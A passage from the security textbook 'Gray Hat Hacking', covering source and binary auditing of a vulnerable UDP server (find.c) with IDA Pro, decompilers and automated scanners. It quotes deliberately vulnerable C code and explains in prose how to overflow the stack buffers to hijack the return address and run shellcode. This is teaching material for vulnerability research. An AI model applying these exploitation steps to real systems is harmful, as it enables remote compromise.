if (pid == 0) { //Then this must be the child
manage_request(buf, sock, &fsin); //child handles packet
exit(0); //child exits after packet is processed
}
}
Gray Hat Hacking: The Ethical Hacker’s Handbook
286
The preceding code shows a parent process looping to receive incoming UDP packets
using the recvfrom() function. Following a successful recvfrom(), a child process is
forked and the manage_request() function called to process the received packet.We need
to trace into manage_request() to see what happens with the user’s input. We can see
right off the bat that none of the parameters passed in to manage_request() deals with
the size of buf, which should make the hair on the back of our neck stand up. The manage_
request() function starts out with a number of data declarations as shown here:
162: void manage_request(char *buf, int sock,
163: struct sockaddr_in* addr) {
164: char init_cwd[1024];
165: char cmd[512];
166: char outf[512];
167: char replybuf[65536];
168: char *user;
169: char *password;
170: char *filename;
171: char *keyword;
172: char *envstrings[16];
173: char *id;
174: char *field;
175: char *p;
176: int i;
Here we see the declaration of many of the fixed-size buffers noted earlier by RATS.
We know that the input parameter buf points to the incoming UDP packet, and the
buffer may contain up to 65535 bytes of data (the maximum size of a UDP packet).
There are two interesting things to note here—first, the length of the packet is not passed
into the function, so bounds checking will be difficult and perhaps completely dependent
on well-formed packet content. Second, several of the local buffers are significantly
smaller than 65535 bytes, so the function had better be very careful how it copies information
into those buffers. Earlier, itwas mentioned that the buffer at line 172 is vulnerable
to an overflow. That seems a little difficult given that there is a 64KB buffer sitting
between it and the return address.
NOTE Local variables are generally allocated on the stack in the order in
which they are declared, which means that replybuf generally sits between
envstrings and the saved return address. Recent versions of gcc/g++ (version
4.1 and later) perform stack variable reordering, which makes variable
locations far less predictable.
The function proceeds to set some of the pointers by parsing the incoming packet,
which is expected to be formatted as follows:
id some_id_value\n
user some_user_name\n
password some_users_password\n
filename some_filename\n
keyword some_keyword\n
environ key=value key=value key=value ...\n
Chapter 12: Passive Analysis
287
PART IV
The pointers in the stack are set by locating the key name, searching for the following
space, and incrementing by one character position. The values become null terminated
when the trailing \n is located and replaced with \0. If the key names are not found in
the order listed, or trailing \n characters fail to be found, the input is considered malformed
and the function returns. Parsing the packet goes well until processing of the
optional environ values begins. The environ field is processed by the following code
(note, the pointer p at this point is positioned at the next character that needs parsing
within the input buffer):
envstrings[0] = NULL; //assume no environment strings
if (!strncmp("environ", p, strlen("environ"))) {
field = memchr(p, ' ', strlen(p)); //find trailing space
if (field == NULL) { //error if no trailing space
reply(id, "missing environment value", sock, addr);
return;
}
field++; //increment to first character of key
i = 0; //init our index counter into envstrings
while (1) { //loop as long as we need to
envstrings[i] = field; //save the next envstring ptr
p = memchr(field, ' ', strlen(field)); //trailing space
if (p == NULL) { //if no space then we need a newline
p = memchr(field, '\n', strlen(field));
if (p == NULL) {
reply(id, "malformed environment value", sock, addr);
return;
}
*p = '\0'; //found newline terminate last envstring
i++; //count the envstring
break; //newline marks the end so break
}
*p = '\0'; //terminate the envstring
field = p + 1; //point to start of next envstring
i++; //count the envstring
}
envstrings[i] = NULL; //terminate the list
}
Following the processing of the environ field, each pointer in the envstrings array is
passed to the putenv() function, so these strings are expected to be in the form key=
value. In analyzing this code, note that the entire environ field is optional, but skipping
itwouldn’t be any fun for us. The problem in the code results from the fact that the while
loop that processes each new environment string fails to do any bounds checking on the
counter i, but the declaration of envstrings only allocates space for 16 pointers. If more
than 16 environment strings are provided, the variables below the envstrings array on
the stack will start to get overwritten. We have the makings of a buffer overflow at this
point, but the question becomes: “Can we reach the saved return address?” Performing
some quick math tells us that there are about 67600 bytes of stack space between the
envstrings array and the saved frame pointer/saved return address. Since each member
of the envstrings array occupies 4 bytes, if we add 67600/4 = 16900 additional environment
strings to our input packet, the pointers to those strings will overwrite all of the
stack space up to the saved frame pointer.
Gray Hat Hacking: The Ethical Hacker’s Handbook
288
Two additional environment strings will give us an overwrite of the frame pointer
and the return address. How can we include 16918 environment strings if the form key=
value is in our packet? If a minimal environment string, say x=y, consumes 4 bytes
counting the trailing space, then it would seem that our input packet needs to accommodate
67672 bytes of environment strings alone. Since this is larger than the maximum
UDP packet size, we seem to be out of luck. Fortunately for us, the preceding loop
does no parsing of each environment string, so there is no reason for a malicious user to
use properly formatted (key=value) strings. It is left to the reader to verify that placing
approximately 16919 space characters between the keyword environ and the trailing
carriage return should result in an overwrite of the saved return address. Since an input
line of that size easily fits in a UDP packet, all we need to do now is consider where to
place our shellcode. The answer is to make it the last environment string, and the nice
thing about this vulnerability is that we don’t even need to determine what value to
overwrite the saved return address with, as the preceding code handles it for us. Understanding
that point is also left to the reader as an exercise.
References
RATS www.fortifysoftware.com/security-resources/rats.jsp
ITS4 www.cigital.com/its4/
FlawFinder www.dwheeler.com/flawfinder/
Splint www.splint.org
PREfast http://research.microsoft.com/displayArticle.aspx?id=634
Binary Analysis
Source code analysis will not always be possible. This is particularly true when evaluating
closed source, proprietary applications. This by no means prevents the reverse engineer
from examining an application; it simply makes such an examination a bit more
difficult. Binary auditing requires a somewhat different skill set than source code auditing.
Whereas a competent C programmer can audit C source code regardless of what
type of architecture the code is intended to be compiled on, auditing binary code
requires additional skills in assembly language, executable file formats, compiler behavior,
operating system internals, and various other lower-level skills. Books offering to
teach you how to program are a dime a dozen, while books that cover the topic of
reverse engineering binaries are few and far between. Proficiency at reverse-engineering
binaries requires patience, practice, and a good collection of reference material. All you
need to do is consider the number of different assembly languages, high-level languages,
compilers, and operating systems that exist to begin to understand how many
possibilities there are for specialization.
Manual Auditing of Binary Code
Two types of tools that greatly simplify the task of reverse engineering a binary file are
disassemblers and decompilers. The purpose of a disassembler is to generate assembly
Chapter 12: Passive Analysis
289
PART IV
language from a compiled binary, while the purpose of a decompiler is to attempt to generate
source code from a compiled binary. Each task has its own challenges and both are
certainly very difficult, with decompilation being by far the more difficult of the two.
This is because the act of compiling source code is both a lossy operation, meaning information
is lost in the process of generating machine language, and a one-to-many operation,
meaning there are many valid translations of a single line of source code to
equivalent machine language statements. Information that is lost during compilation
can include variable names and data types, making recovery of the original source code
from the compiled binary all but impossible. Additionally, a compiler asked to optimize
a program for speed will generate vastly different code than that same compiler asked to
optimize that same program for size. So while both compiled versions will be functionally
equivalent, they will look very different to a decompiler.
Decompilers
Decompilation is perhaps the holy grail of binary auditing. With true decompilation, the
notion of a closed source product vanishes, and binary auditing reverts to source code
auditing as discussed previously. As mentioned earlier, however, true decompilation is an
exceptionally difficult task. Some languages lend themselves very nicely to decompilation
while others do not. Languages that offer the best opportunity for decompilation are typically
hybrid compiled/interpreted languages such as Java or Python. Both are examples of
languages that are compiled to an intermediate, machine-independent form, generally
called byte code. This machine-independent byte code is then executed by a machinedependent
byte code interpreter. In the case of Java, this interpreter is called a Java Virtual
Machine (JVM). Two features of Java byte code make it particularly easy to decompile.
First, compiled Java byte code files, called class files, contain a significant amount of
descriptive information. Second, the programming model for the JVM is fairly simple, and
its instruction set fairly small. Both of these properties are true of compiled Python (pyc)
files and the Python interpreter as well. A number of open source Java decompilers do an
excellent job of recovering Java source code, including JReversePro and Jad. For Python
pyc files, the decompyle project offers source code recovery services, but as of this writing
the open source version only handles Python files from versions 2.3 and earlier (2.5.1 is
the current Python version at this writing).
Java Decompilation Example The following simple example demonstrates the
degree to which source code can be recovered from a compiled Java class file. The original
source for the class PasswordChecker appears here:
public class PasswordChecker {
public boolean checkPassword(String pass) {
byte[] pwChars = pass.getBytes();
for (int i = 0; i < pwChars.length; i++) {
pwChars[i] += i + 1;
}
String pwPlus = new String(pwChars);
return pwPlus.equals("qcvw|uyl");
}
}
Gray Hat Hacking: The Ethical Hacker’s Handbook
290
JReversePro is an open source Java decompiler that is itself written in Java. Running
JReversePro on the compiled PasswordChecker.class file yields the following:
// JReversePro v 1.4.1 Wed Mar 24 22:08:32 PST 2004
// http://jrevpro.sourceforge.net
// Copyright (C)2000 2001 2002 Karthik Kumar.
// JReversePro comes with ABSOLUTELY NO WARRANTY;
// This is free software, and you are welcome to redistribute
// it under certain conditions; See the File 'COPYING' for more details.
// Decompiled by JReversePro 1.4.1
// Home : http://jrevpro.sourceforge.net
// JVM VERSION: 46.0
// SOURCEFILE: PasswordChecker.java
public class PasswordChecker{
public PasswordChecker()
{
;
return;
}
public boolean checkPassword(String string)
{
byte[] iArr = string.getBytes();
int j = 0;
String string3;
for (;j < iArr.length;) {
iArr[j] = (byte)(iArr[j] + j + 1);
j++;
}
string3 = new String(iArr);
return (string3.equals("qcvw|uyl"));
}
}
The quality of the decompilation is quite good. There are only a few minor differences
in the recovered code. First, we see the addition of a default constructor not present
in the original but added during the compilation process.
NOTE In object-oriented programming languages, object data types generally
contain a special function called a constructor. Constructors are invoked each
time an object is created in order to initialize each new object. A default
constructor is one that takes no parameters. When a programmer fails to
define any constructors for declared objects, compilers generally generate a single default
constructor that performs no initialization.
Second, note that we have lost all local variable names and that JReversePro has generated
its own names according to variable types. JReversePro is able to fully recover
class names and function names, which helps to make the code very readable. If the class
had contained any class variables, JReversePro would have been able to recover their
original names as well. It is possible to recover so much data from Java files because of
the amount of information stored in each class file. This information includes items
Chapter 12: Passive Analysis
291
PART IV
such as class names, function names, function return types, and function parameter signatures.
All of this is clearly visible in a simple hex dump of a portion of a class file:
CA FE BA BE 00 00 00 2E 00 1E 0A 00 08 00 11 0A ................
00 03 00 12 07 00 13 0A 00 03 00 14 08 00 15 0A ................
00 03 00 16 07 00 17 07 00 18 01 00 06 3C 69 6E .............
01 00 0F 4C 69 6E 65 4E 75 6D 62 65 72 54 61 62 ...LineNumberTab
6C 65 01 00 0D 63 68 65 63 6B 50 61 73 73 77 6F le...checkPasswo
72 64 01 00 15 28 4C 6A 61 76 61 2F 6C 61 6E 67 rd...(Ljava/lang
2F 53 74 72 69 6E 67 3B 29 5A 01 00 0A 53 6F 75 /String;)Z...Sou
72 63 65 46 69 6C 65 01 00 14 50 61 73 73 77 6F rceFile...Passwo
72 64 43 68 65 63 6B 65 72 2E 6A 61 76 61 0C 00 rdChecker.java..
09 00 0A 0C 00 19 00 1A 01 00 10 6A 61 76 61 2F ...........java/
6C 61 6E 67 2F 53 74 72 69 6E 67 0C 00 09 00 1B lang/String.....
01 00 08 71 63 76 77 7C 75 79 6C 0C 00 1C 00 1D ...qcvw|uyl.....
01 00 0F 50 61 73 73 77 6F 72 64 43 68 65 63 6B ...PasswordCheck
65 72 01 00 10 6A 61 76 61 2F 6C 61 6E 67 2F 4F er...java/lang/O
62 6A 65 63 74 01 00 08 67 65 74 42 79 74 65 73 bject...getBytes
01 00 04 28 29 5B 42 01 00 05 28 5B 42 29 56 01 ...()[B...([B)V.
00 06 65 71 75 61 6C 73 01 00 15 28 4C 6A 61 76 ..equals...(Ljav
61 2F 6C 61 6E 67 2F 4F 62 6A 65 63 74 3B 29 5A a/lang/Object;)Z
With all of this information present, it is a relatively simple matter for any Java
decompiler to recover high-quality source code from a class file.
Decompilation in Other Compiled Languages Unlike Java and Python,
which compile to a platform-independent byte code, languages like C and C++ are compiled
to platform-specific machine language, and linked to operating system–specific
libraries. This is the first obstacle to decompiling programs written in such languages. A
different decompiler would be required for each machine language that we wish to
decompile. Further complicating matters, compiled programs can generally be stripped
of all debugging and naming (symbol) information, making it impossible to recover
any of the original names used in the program, including function and variable names
and type information. Nevertheless, research and development on decompilers does
continue. The leading contender in this arena is a new product from the author of the
Interactive Disassembler Professional (IDA Pro). The tool, named Hex-Rays, is an IDA
plug-in that can be used to generate decompilations of compiled x86 programs.
Disassemblers
While decompilation of compiled code is an extremely challenging task, disassembly of
that same code is not. For any compiled program to execute, it must communicate some
information to its host operating system. The operating system will need to know the
entry point of the program (the first instruction that should execute when the program
is started), the desired memory layout of the program including the location of code and
data, and what libraries the program will need access to while it is executing. All of this
information is contained within an executable file and is generated during the compilation
and linking phases of the program’s development. Loaders interpret these executable
files to communicate the required information to the operating system when a file
is executed. Two common executable file formats are the Portable Executable (PE) file
Gray Hat Hacking: The Ethical Hacker’s Handbook
292
PART IV
Chapter 12: Passive Analysis
293
format used for Microsoft Windows executables, and the Executable and Linking Format
(ELF) used by Linux and other Unix variants. Disassemblers function by interpreting
these executable file formats (in a manner similar to the operating system loader) to
learn the layout of the executable, and then processing the instruction stream starting
from the entry point to break the executable down into its component functions.
IDA Pro
IDA Pro was created by Ilfak Guilfanov of DataRescue Inc., and as mentioned earlier it is
perhaps the premier disassembly tool available today. IDA understands a large number
of machine languages and executable file formats. At its heart, IDA is actually a database
application. When a binary is loaded for analysis, IDA loads each byte of the binary into
a database and associates various flags with each byte. These flags can indicate whether a
byte represents code, data, or more specific information such as the first byte of a
multibyte instruction. Names associated with various program locations and comments
generated by IDA or entered by the user are also stored into the database. Disassemblies
are saved as .idb files separate from the original binary, and .idb files are referred to
as database files. Once a disassembly has been saved to its associated database file, IDA
has no need for the original binary, as all information is incorporated into the database
file. This is useful if youwant to analyze malicious software but don’twant the malicious
binary to remain present on your system.
When used to analyze dynamically linked binaries, IDA Pro makes use of embedded
symbol table information to recognize references to external functions. Within IDA
Pro’s disassembly listing, the use of standard library names helps make the listing far
more readable. For example,
call strcpy
is far more readable than
call sub_8048A8C ;call the function at address 8048A8C
For statically linked C/C++ binaries, IDA uses a technique termed Fast Library Identification
and Recognition Technology (FLIRT), which attempts to recognize whether a given
machine language function is known to be a standard library function. This is accomplished
by matching disassembled code against signatures of standard library functions
used by common compilers. With FLIRT and the application of function type signatures,
IDA is able to produce a much more readable disassembly.
In addition to a straightforward disassembly listing, IDA contains a number of powerful
features that greatly enhance your ability to analyze a binary file. Some of these features
include
• Graphing capabilities to chart function relationships
• Flowcharting capabilities to chart function flow
• A strings window to display sequences of ASCII or Unicode characters
contained in the binary file
• A large database of common data structure layouts and function prototypes
• A powerful plug-in architecture that allows extensions to IDA’s capabilities to be
easily incorporated
• A scripting engine for automating many analysis tasks
• An integrated debugger
Using IDA Pro An IDA session begins when you select a binary file to analyze.
Figure 12-1 shows the initial analysis window displayed by IDA once a file has been
opened. Note that IDA has already recognized this particular file as a PE format
executable for Microsoft Windows and has chosen x86 as the processor type. When a file
is loaded into IDA, a significant amount of initial analysis takes place. IDA analyzes the
instruction sequence, assigning location names to all program addresses referred to by
jump or call instructions, and assigning data names to all program locations referred to
in data references. If symbol table information is present in the binary, IDA will utilize
names derived from the symbol table rather than automatically generated names.
IDA assigns global function names to all locations referenced by call instructions and
attempts to locate the end of each function by searching for corresponding return
instructions. A particularly impressive feature of IDA is its ability to track program stack
Gray Hat Hacking: The Ethical Hacker’s Handbook
294
Figure 12-1 The IDA Pro file loading dialog
usage within each recognized function. In doing so, IDA builds an accurate picture of
the stack frame structure used by each function, including the precise layout of local
variables and function parameters. This is particularly useful when you want to determine
exactly how much data it will take to fill a stack allocated buffer and to overwrite a
saved return address. While source code can tell you how much space a programmer
requested for a local array, IDA can show you exactly how that array gets allocated at
runtime, including any compiler-inserted padding. Following initial analysis, IDA positions
the disassembly display at the program entry point as shown in Figure 12-2. This is
a typical function disassembly in IDA. The stack frame of the function is displayed first,
then the disassembly of the function itself.
By convention, IDA names local variables var_XXX, where XXX refers to the variable’s
negative offset within the stack relative to the stack frame pointer. Function parameters are
named arg_XXX, where XXX refers to the parameter’s positive offset within the stack relative
to the saved function return address. Note in Figure 12-2 that some of the local variables
are assigned more traditional names. IDA has determined that these particular variables are
used as parameters to known library functions and has assigned names to them based on
names used in API (application program interface) documentation for those functions’ prototypes.
You can also see how IDA can recognize references to string data and assign a variable
name to the string while displaying its content as an inline comment. Figure 12-3
shows howIDA replaces relatively meaningless call target addresses with much more meaningful
library function names. Additionally, IDA has inserted comments where it understands
the data types expected for the various parameters to each function.
Chapter 12: Passive Analysis
295
PART IV
Figure 12-2 An IDA disassembly listing
Gray Hat Hacking: The Ethical Hacker’s Handbook
296
Navigating an IDA Pro Disassembly Navigating your way around an IDA disassembly
is very simple. Holding the cursor over any address used as an operand causes
IDA to display a tool tip window that shows the disassembly at the operand address.
Double-clicking that same operand causes the disassembly window to jump to the associated
address. IDA maintains a history list to help you quickly back out to your original
disassembly address. The ESC key acts like the Back button in a web browser.
Making Sense of a Disassembly As you work your way through a disassembly
and determine what actions a function is carrying out or what purpose a variable serves,
you can easily change the names IDA has assigned to those functions or variables. To
rename any variable, function, or location, simply click the name you want to change,
and then use the Edit menu, or right-click for a context-sensitive menu to rename the
item to something more meaningful. Virtually every action in IDA has an associated
hotkey combination and it pays to become familiar with the ones you use most frequently.
The manner in which operands are displayed can also be changed via the Edit |
Operand Type menu. Numeric operands can be displayed as hex, decimal, octal, binary,
or character values. Contiguous blocks of data can be organized as arrays to provide
more compact and readable displays (Edit | Array). This is particularly useful when
Figure 12-3 IDA naming and commenting
organizing and analyzing stack frame layouts as shown in Figure 12-4 and Figure 12-5.
The stack frame for any function can be viewed in more detail by double-clicking any
stack variable reference in the function’s disassembly.
Finally, another useful feature is the ability to define structure templates and apply
those templates to data in the disassembly. Structures are declared in the structures
subview (View | Open Subviews | Structures), and applied using the Edit | Struct Var
menu option. Figure 12-6 shows two structures and their associated data fields.
Chapter 12: Passive Analysis
297
PART IV
Figure 12-4 IDA stack frame prior to type consolidation
Figure 12-5 IDA stack frame after type consolidation
Gray Hat Hacking: The Ethical Hacker’s Handbook
298
Once a structure type has been applied to a block of data, disassembly references
within the block can be displayed using structure offset names, rather than more cryptic
numeric offsets. Figure 12-7 is a portion of a disassembly that makes use of IDA’s structure
declaration capability. The local variable sa has been declared as a sockaddr_in
struct, and the local variable hostent represents a pointer to a hostent structure.
NOTE The sockaddr_in and hostent data structures are used frequently in
C/C++ for network programming. A sockaddr_in describes an Internet
address, including host IP and port information. A hostent data structure is
used to return the results of a DNS lookup to a C/C++ program.
Disassemblies are made more readable when structure names are used rather than register
plus offset syntax. For comparison, the operand at location 0804A2C8 has been left
unaltered, while the same operand reference at location 0804A298 has been converted to
the structure offset style and is clearly more readable as a field within a hostent struct.
Vulnerability Discovery with IDA Pro The process of manually searching
for vulnerabilities using IDA Pro is similar in many respects to searching for vulnerabilities
in source code. A good start is to locate the places in which the program accepts userprovided
input, and then attempt to understand how that input is used. It is helpful if
IDA Pro has been able to identify calls to standard library functions. Because you are
reading through an assembly language listing, it is likely that your analysis will take far
longer than a corresponding read through source code. Use references for this activity,
Figure 12-6 IDA structure definition window
including appropriate assembly language reference manuals and a good guide to the
APIs for all recognized library calls. It will be important for you to understand the effect
of each assembly language instruction, as well as the requirements and results for calls
to library functions. An understanding of basic assembly language code sequences as
generated by common compilers is also essential. At a minimum, you should understand
the following:
• Function prologue code The first few statements of most functions used to
set up the function’s stack frame and allocate any local variables
• Function epilogue code The last few statements of most functions used to
clear the function’s local variables from the stack and restore the caller’s stack
frame
• Function calling conventions Dictate the manner in which parameters are
passed to functions and how those parameters are cleaned from the stack once
the function has completed
• Assembly language looping and branching primitives The instructions used
to transfer control to various locations within a function, often according to the
outcome of a conditional test
• High-level data structures Laid out in memory; various assembly language
addressing modes are used to access this data
Chapter 12: Passive Analysis
299
PART IV
Figure 12-7 Applying IDA structure templates
Finishing Up with find.c Let’s use IDA Pro to take a look at the sprintf() call that
was flagged by all of the auditing tools used in this chapter. IDA’s disassembly listing leading
up to the potentially vulnerable call at location 08049A8A is shown in Figure 12-8. In
the example, variable names have been assigned for clarity. We have this luxury because
we have seen the source code. If we had never seen the source code, we would be dealing
with more generic names assigned during IDA’s initial analysis.
It is perhaps stating the obvious at this point, but important nonetheless, to note that
we are looking at compiled C code. One reason we know this, aside from having peeked
at some of the source already, is that the program is linked against the C standard library.
An understanding of the C calling conventions helps us track down the parameters that
are being passed to sprintf() here. First, the prototype for sprintf() looks like this:
int sprintf(char *str, const char *format, ...);
The sprintf() function generates an output string based on a supplied format string
and optional data values to be embedded in the output string according to field specifications
within the format string. The destination character array is specified by the first
parameter, str. The format string is specified in the second parameter, format, and any
required data values are specified as needed following the format string. The security
problem with sprintf() is that it doesn’t perform length checking on the output string to
determine whether it will fit into the destination character array. Since we have compiled
C, we expect parameter passing to take place using the C calling conventions, which specify
that parameters to a function call are pushed onto the stack in right-to-left order.
Gray Hat Hacking: The Ethical Hacker’s Handbook
300
Figure 12-8 A potentially vulnerable call to sprintf()
This means that the first parameter to sprintf(), str, is pushed onto the stack last. To track
down the parameters supplied to this sprintf() call, we need to work backwards from the
call itself. Each push statement that we encounter is placing an additional parameter onto
the stack. We can observe six push statements following the previous call to sprintf() at
location 08049A59. The values associated with each push (in reverse order) are
str: cmd
format: "find %s -name \"%s\" -exec grep -H -n %s \\{\\} \\; > %s"
string1: init_cwd
string2: filename
string3: keyword
string4: outf
Strings 1 through 4 represent the four string parameters expected by the format string.
The lea (Load Effective Address) instructions at locations 08049A64, 08049A77, and
08049A83 in Figure 12-8 compute the address of the variables outf, init_cwd, and cmd
respectively. This lets us know that these three variables are character arrays, while the
fact that filename and keyword are used directly lets us know that they are character
pointers. To exploit this function call, we need to know if this sprintf() call can be made
to generate a string not only larger than the size of the cmd array, but also large enough
to reach the saved return address on the stack. Double-clicking any of the variables just
named will bring up the stack frame window for the manage_request() function
(which contains this particular sprintf() call) centered on the variable that was clicked.
The stack frame is displayed in Figure 12-9 with appropriate names applied and array
aggregation already complete.
Figure 12-9 indicates that the cmd buffer is 512 bytes long and that the 1032-byte
init_cwd buffer lies between cmd and the saved return address at offset 00000004. Simple
math tells us that we need sprintf() to write 1552 bytes (512 for cmd, 1032 bytes for
init_cwd, 4 bytes for the saved frame pointer, and 4 bytes for the saved return address) of
Chapter 12: Passive Analysis
301
PART IV
Figure 12-9 The relevant stack arguments for sprintf()
data into cmd in order to completely overwrite the return address. The sprintf() call we
are looking at decompiles into the following C statement:
sprintf(cmd,
"find %s -name \"%s\" -exec grep -H -n %s \\{\\} \\; > %s",
init_cwd, filename, keyword, outf);
We will cheat a bit here and rely on our earlier analysis of the find.c source code to
remember that the filename and keyword parameters are pointers to user-supplied
strings from an incoming UDP packet. Long strings supplied to either filename or keyword
should get us a buffer overflow. Without access to the source code, we would need
to determine where each of the four string parameters obtains its value. This is simply a
matter of doing a little additional tracing through the manage_request() function.
Exactly how long does a filename need to be to overwrite the saved return address? The
answer is somewhat less than the 1552 bytes mentioned earlier, because there are output
characters sent to the cmd buffer prior to the filename parameter. The format string
itself contributes 13 characters prior to writing the filename into the output buffer, and
the init_cwd string also precedes the filename. The following code from elsewhere in
manage_request () shows how init_cwd gets populated:
.text:08049A12 push 1024
.text:08049A17 lea eax, [ebp+init_cwd]
.text:08049A1D push eax
.text:08049A1E call _getcwd
We see that the absolute path of the current working directory is copied into init_cwd,
and we receive a hint that the declared length of init_cwd is actually 1024 bytes, rather
than 1032 bytes as Figure 12-9 seems to indicate. The difference is because IDA displays
the actual stack layout as generated by the compiler, which occasionally includes padding
for various buffers. Using IDA allows you to see the exact layout of the stack frame,
while viewing the source code only shows you the suggested layout. How does the value
of init_cwd affect our attempt at overwriting the saved return address? We may not
always know what directory the find application has been started from, so we can’t
always predict how long the init_cwd string will be. We need to overwrite the saved
return address with the address of our shellcode, so our shellcode offset needs to be
included in the long filename argument that we will use to cause the buffer overflow.We
need to know the length of init_cwd in order to properly align our offset within the filename.
Since we don’t know it, can the vulnerability be reliably exploited? The answer is
to first include many copies of our offset to account for the unknown length of init_cwd
and, second, to conduct the attack in four separate UDP packets in which the byte alignment
of the filename is shifted by one byte in each successive packet. One of the four
packets is guaranteed to be aligned to properly overwrite the saved return address.
Decompilation with Hex-Rays A recent development in the decompilation
field is Ilfak’s Hex-Rays plug-in for IDA Pro. In beta testing at the time of this writing,
Hex-Rays integrates with IDA Pro to form a very powerful disassembly/decompilation
duo. The goal of Hex-Rays is not to generate source code that is ready to compile. Rather,
the goal is to produce source code that is sufficiently readable that analysis becomes
Gray Hat Hacking: The Ethical Hacker’s Handbook
302
significantly easier than disassembly analysis. Sample Hex-Rays output is shown in the
following listing, which contains the previously discussed portions of the manage_
request() function from the find binary.
char v59; // [sp+10290h] [bp-608h]@76
sprintf(&v59, "find %s -name \"%s\" -exec grep -H -n %s \\{\\} \\; > %s",
&v57, v43, buf, &v58);
system(&v59);
While the variable names may not make things obvious,we can see that variable v59 is the
destination array for the sprintf() function. Furthermore, by observing the declaration of
v59, we can see that the array sits 608h (1544) bytes above the saved frame pointer, which
agrees precisely with the analysis presented earlier.We know the stack frame layout based
on the Hex-Rays-generated comment that indicates that v59 resides at memory location
[bp-608h]. Hex-Rays integrates seamlessly with IDA Pro and offers interactive manipulation
of the generated source code in much the same way that the IDA-generated disassembly
can be manipulated.
BinNavi
Disassembly listings for complex programs can become very difficult to follow because
program listings are inherently linear, while programs are very nonlinear as a result of all
of the branching operations that they perform. BinNavi from SABRE Security is a tool that
provides for graph-based analysis and debugging of binaries. BinNavi operates on IDAgenerated
databases by importing them into a SQL database (mysql is currently supported),
and then offering sophisticated graph-based views of the binary. BinNavi utilizes
the concept of proximity browsing to prevent the display from becoming too cluttered.
BinNavi graphs rely heavily on the concept of the basic block. A basic block is a sequence of
instructions that, once entered, is guaranteed to execute in its entirety. The first instruction
in any basic block is generally the target of a jump or call instruction, while the last
instruction in a basic block is typically either a jump or return. Basic blocks provide a convenient
means for grouping instructions together in graph-based viewers, as each block
can be represented by a single node within a function’s flowgraph. Figure 12-10 shows a
selected basic block and its immediate neighbors.
The selected node has a single parent and two children. The proximity settings for this
view are one node up and one node down. The proximity distance is configurable
within BinNavi, allowing users to see more or less of a binary at any given time. Each
time a new node is selected, the BinNavi display is updated to show only the neighbors
that meet the proximity criteria. The goal of the BinNavi display is to decompose complex
functions sufficiently enough to allow analysts to quickly comprehend the flow of
those functions.
References
JRevPro http://sourceforge.net/projects/jrevpro/
Jad www.kpdus.com/jad.html
decompyle www.crazy-compilers.com/decompyle/
Chapter 12: Passive Analysis
303
PART IV
IDA Pro www.datarescue.com/idabase/
Hex-Rays www.hexblog.com/
BinNavi http://sabre-security.com/
Pentium References www.intel.com/design/Pentium4/documentation.htm#man
Automated Binary Analysis Tools
To automatically audit a binary for potential vulnerabilities, any tool must first understand
the executable file format used by the binary, be able to parse the machine language
instructions contained within the binary, and finally determine whether the
binary performs any actions that might be exploitable. Such tools are far more specialized
than source code auditing tools. For example, C source code can be automatically
scanned no matter what target architecture the code is ultimately compiled for; whereas
binary auditing tools will need a separate module for each executable file format they
Gray Hat Hacking: The Ethical Hacker’s Handbook
304
Figure 12-10 Example BinNavi display
Chapter 12: Passive Analysis
305
PART IV
are capable of interpreting, as well as a separate module for each machine language they
can recognize. Additionally, the high-level language used to write the application and
the compiler used to compile it can each influence what the compiled code looks like.
Compiled C/C++ source code looks very different than compiled Delphi or Java code.
The same source code compiled with two different compilers may possess many similarities
but will also possess many differences.
The major challenge for such products centers on the ability to accurately characterize
behavior that leads to an exploitable condition. Examples of such behaviors include access
outside of allocated memory (whether in the stack or the heap), use of uninitialized variables,
or passing user input directly to dangerous functions. To accomplish any of these
tasks, an automated tool must be able to accurately compute ranges of values taken on by
index variables and pointers, followthe flowof user-input values as they are used within the
program, and track the initialization of all variables referenced by the program. Finally, to
be truly effective, automated vulnerability discovery tools must be able to perform each of
these tasks reliably while dealing with the many different algorithmic implementations
used by both programmers and their compilers. Suffice it to say there have not been many
entries into this holy grail of markets, and of those, most have been priced out of the average
user’s hands.
We will briefly discuss three different tools that perform some form of automated
binary analysis. Each of these tools takes a radically different approach to their analysis,
which serves to illustrate the difficulty with automated analysis in general. The three tools
are Halvar Flake’s BugScam, Tyler Durden’s Chevarista, and BinDiff from SABRE Security.
BugScam
An early entry in this space, BugScam is a collection of scripts by Halvar Flake for use with
IDA Pro, the Interactive Disassembler Professional from DataRescue. Two of the powerful
features of IDA are its scripting capabilities and its plug-in architecture. Both of these features
allow users to extend the capabilities of IDA and take advantage of the extensive
analysis that IDA performs on target binaries. Similar to the source code tools discussed
earlier, BugScam scans for potentially insecure uses of functions that often lead to exploitable
conditions. Unlike most of the source code scanners, BugScam attempts to perform
some rudimentary data flow analysis to determine whether the function calls it identifies
are actually exploitable. BugScam generates an HTML report containing the virtual
addresses at which potential problems exist. Because the scripts are run from within IDA
Pro, it is a relatively easy task to navigate to each trouble spot for further analysis on
whether the indicated function calls are actually exploitable. The BugScam scripts leverage
the powerful analysis capabilities of IDA Pro, which is capable of recognizing a large number
of executable file formats, as well as many machine languages.
Sample BugScam output for the compiled find.c binary appears next:
Code Analysis Report for find
This is an automatically generated report on the frequency of misuse of
certain known-to-be-problematic library functions in the executable file
find. The contents of this file are automatically generated using simple
heuristics, thus any reliance on the correctness of the statements in
this file is your own responsibility.
Gray Hat Hacking: The Ethical Hacker’s Handbook
306
General Summary
A total number of 7 library functions were analyzed. Counting all
detectable uses of these library calls, a total of 3 was analyzed, of
which 1 were identified as problematic.
The complete list of problems
Results for .sprintf
The following table summarizes the results of the analysis of calls to
the function .sprintf.
Address Severity Description
8049a8a 5 The maximum expansion of the data appears to be
larger than the target buffer, this might be the
cause of a buffer overrun !
Maximum Expansion: 1587 Target Size: 512
Chevarista
In issue 64 of Phrack, in an article entitled “Automated vulnerability auditing in machine
code,” Tyler Durden introduced a tool named Chevarista. Chevarista is a proof-of-concept
binary analysis tool implemented for the analysis of SPARC binaries. The tool is only
available upon request from its author. The significant feature of the article is that it presents
program analysis in a very formal manner and details the ways in which control flow
analysis and data flow analysis can be combined to recognize flaws in compiled software.
Some of the capabilities of Chevarista include interval analysis, which is used to deduce
the range of values that variables can take on at runtime and allows the user to recognize
out of range memory accesses; and state checking, which the author utilizes to detect
memory leaks and double free conditions. The article’s primary purpose is to present formal
program analysis theory in a traditionally non-formal venue in the hopes of sparking
interest in this type of analysis. For more information, readers are invited to review followon
work on the ERESI Reverse Engineering Software Interface.
BinDiff
An alternative approach to locating vulnerabilities is to allow vendors to locate and fix
the vulnerabilities themselves, and then, in the wake of a patch, to study exactly what
has changed in the patched program. Under the assumption that patches either add
completely new functionality or fix broken functionality, it can be useful to analyze each
